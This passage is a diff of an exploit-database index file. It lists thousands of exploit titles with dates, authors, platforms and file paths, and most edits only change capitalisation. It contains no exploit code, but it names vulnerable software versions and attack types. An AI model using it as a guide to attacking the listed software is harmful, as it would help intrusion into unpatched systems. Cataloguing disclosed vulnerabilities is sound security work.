Service",2009-11-16,"Jeremy Brown",windows,dos,80 +10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows/x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 - (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 -40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 +40083,platforms/php/webapps/40083.txt,"Wordpress Activity Log Plugin 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 @@ -9505,7 +9505,7 @@ id,file,description,date,author,platform,type,port 10204,platforms/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution",2009-11-19,mrx,windows,dos,0 10205,platforms/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-11-12,wololo,multiple,dos,0 10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 - UTF-8 Character XML Parsing Remote Denial of Service",2009-11-12,"Peter Valchev",linux,dos,0 -10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 +10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 10208,platforms/windows/dos/10208.txt,"Firefox + Adobe - Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 @@ -9529,7 +9529,7 @@ id,file,description,date,author,platform,type,port 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 Plugin - Exploit",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"Wordpress WP-Cumulus 1.20 Plugin - Exploit",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 @@ -9610,7 +9610,7 @@ id,file,description,date,author,platform,type,port 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - (.gro) Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 -10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 +10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos,0 10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 @@ -9618,7 +9618,7 @@ id,file,description,date,author,platform,type,port 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Transversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 - smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 -10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 - RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 +10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow PoC",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter - Persistant Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC",2009-12-07,"Jeremy Brown",linux,dos,0 @@ -9686,7 +9686,7 @@ id,file,description,date,author,platform,type,port 10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 -10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +10420,platforms/php/webapps/10420.txt,"Ez GuestBook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Stack Overflow",2009-12-14,"Vinod Sharma",windows,local,0 @@ -9784,7 +9784,7 @@ id,file,description,date,author,platform,type,port 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart - 'product_id' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 -10535,platforms/php/webapps/10535.txt,"WordPress Pyrmont 2.x Plugin - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 +10535,platforms/php/webapps/10535.txt,"Wordpress Pyrmont 2.x Plugin - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 @@ -9823,7 +9823,7 @@ id,file,description,date,author,platform,type,port 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation PoC",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - Denial of Service (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 -10583,platforms/php/webapps/10583.txt,"social Web CMS beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 +10583,platforms/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum - Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps,0 @@ -9859,7 +9859,7 @@ id,file,description,date,author,platform,type,port 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps,0 -10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 +10626,platforms/php/webapps/10626.txt,"Jax GuestBook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow (Windows XP SP3)",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery - add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 @@ -9879,7 +9879,7 @@ id,file,description,date,author,platform,type,port 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - (.asx) Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - (.asx) Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps,0 -10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 +10653,platforms/php/webapps/10653.txt,"Winn GuestBook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10655,platforms/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 @@ -9887,8 +9887,8 @@ id,file,description,date,author,platform,type,port 10660,platforms/php/webapps/10660.txt,"barbo91 uploads - Arbitrary File Upload",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 -10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 -10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10665,platforms/php/webapps/10665.txt,"Jevonweb GuestBook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10666,platforms/php/webapps/10666.txt,"Simple PHP GuestBook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 @@ -9961,7 +9961,7 @@ id,file,description,date,author,platform,type,port 10741,platforms/php/webapps/10741.txt,"cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum - SQL Injection",2009-12-27,"ViRuSMaN ",php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 -10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (seh) Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 +10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (SEH) Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-Stream - Windows XP SP2 and SP3 Exploit",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 @@ -10027,7 +10027,7 @@ id,file,description,date,author,platform,type,port 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0 -10825,platforms/php/dos/10825.sh,"WordPress 2.9 - Denial of Service",2009-12-31,emgent,php,dos,80 +10825,platforms/php/dos/10825.sh,"Wordpress 2.9 - Denial of Service",2009-12-31,emgent,php,dos,80 10826,platforms/php/dos/10826.sh,"Drupal 6.16 / 5.21 - Denial of Service",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 @@ -10043,7 +10043,7 @@ id,file,description,date,author,platform,type,port 10838,platforms/php/webapps/10838.txt,"list Web - (addlink.php id) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip - (store_info.php id) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - (.asx) Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 -10841,platforms/php/webapps/10841.pl,"pL-PHP beta 0.9 - Local File Inclusion Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 +10841,platforms/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) Overflow Denial of Service",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice php file browser - Remote File Inclusion / Local File Inclusion",2009-12-31,e.wiZz,php,webapps,0 @@ -10081,14 +10081,14 @@ id,file,description,date,author,platform,type,port 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 -",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals - Local File Inclusion",2010-01-02,FL0RiX,php,webapps,0 -10929,platforms/php/webapps/10929.txt,"WordPress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 +10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,php,webapps,0 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0 @@ -10132,7 +10132,7 @@ id,file,description,date,author,platform,type,port 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps,0 11003,platforms/php/webapps/11003.txt,"LightOpen CMS 0.1 - Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 -11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 +11005,platforms/asp/webapps/11005.txt,"KMSoft GuestBook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 @@ -10154,7 +10154,7 @@ id,file,description,date,author,platform,type,port 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0 11028,platforms/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 -11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - Cross-Site Scripting",2010-01-06,POPCORN,hardware,webapps,0 +11030,platforms/hardware/webapps/11030.txt,"D-Link DKVM-IP8 - Cross-Site Scripting",2010-01-06,POPCORN,hardware,webapps,0 11031,platforms/php/webapps/11031.txt,"Milonic News - (viewnews) SQL Injection",2010-01-06,Err0R,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow PoC",2010-01-06,s4squatch,windows,dos,0 @@ -10189,7 +10189,7 @@ id,file,description,date,author,platform,type,port 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r and Ablus",php,webapps,0 11084,platforms/windows/dos/11084.pl,"Real Player - Local Crash PoC",2010-01-10,"D3V!L FUCKER",windows,dos,0 -11085,platforms/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 +11085,platforms/php/webapps/11085.txt,"Alex GuestBook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 11086,platforms/php/webapps/11086.txt,"Joomla Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11087,platforms/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps,0 11088,platforms/php/webapps/11088.txt,"Joomla Component com_jcollection - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 @@ -10209,7 +10209,7 @@ id,file,description,date,author,platform,type,port 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 -11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (Win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 +11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows/x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,"ALTBTA ",php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service",2010-01-12,mr_me,ios,dos,8080 @@ -10435,15 +10435,15 @@ id,file,description,date,author,platform,type,port 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (Windows XP SP3)",2010-02-10,"Beenu Arora",windows,local,0 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0 11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 -11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 +11392,platforms/windows/dos/11392.c,"RadASM 2.2.1.6 - (.rap) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 11393,platforms/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,"cp77fk4r ",php,dos,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / File Upload",2010-02-11,JIKO,php,webapps,0 -11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 -11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local,0 +11399,platforms/php/webapps/11399.txt,"myPHP GuestBook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 +11400,platforms/windows/local/11400.py,"RadASM 2.2.1.6 - (.rap) Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 @@ -10451,7 +10451,7 @@ id,file,description,date,author,platform,type,port 11405,platforms/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",windows,dos,80 -11408,platforms/win_x86/local/11408.c,"Radasm - .rap file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 +11408,platforms/win_x86/local/11408.c,"RadASM - .rap file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,multiple,webapps,80 11410,platforms/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,php,webapps,0 11411,platforms/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,php,webapps,0 @@ -10475,7 +10475,7 @@ id,file,description,date,author,platform,type,port 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities",2010-02-13,"ViRuSMaN ",php,webapps,0 11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 -11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 +11441,platforms/php/webapps/11441.txt,"Wordpress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 @@ -10490,7 +10490,7 @@ id,file,description,date,author,platform,type,port 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 -11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 Plugin - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 +11458,platforms/php/webapps/11458.txt,"Wordpress Copperleaf Photolog 0.16 Plugin - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Arbitrary File Upload (Bypass)",2010-02-15,indoushka,php,webapps,0 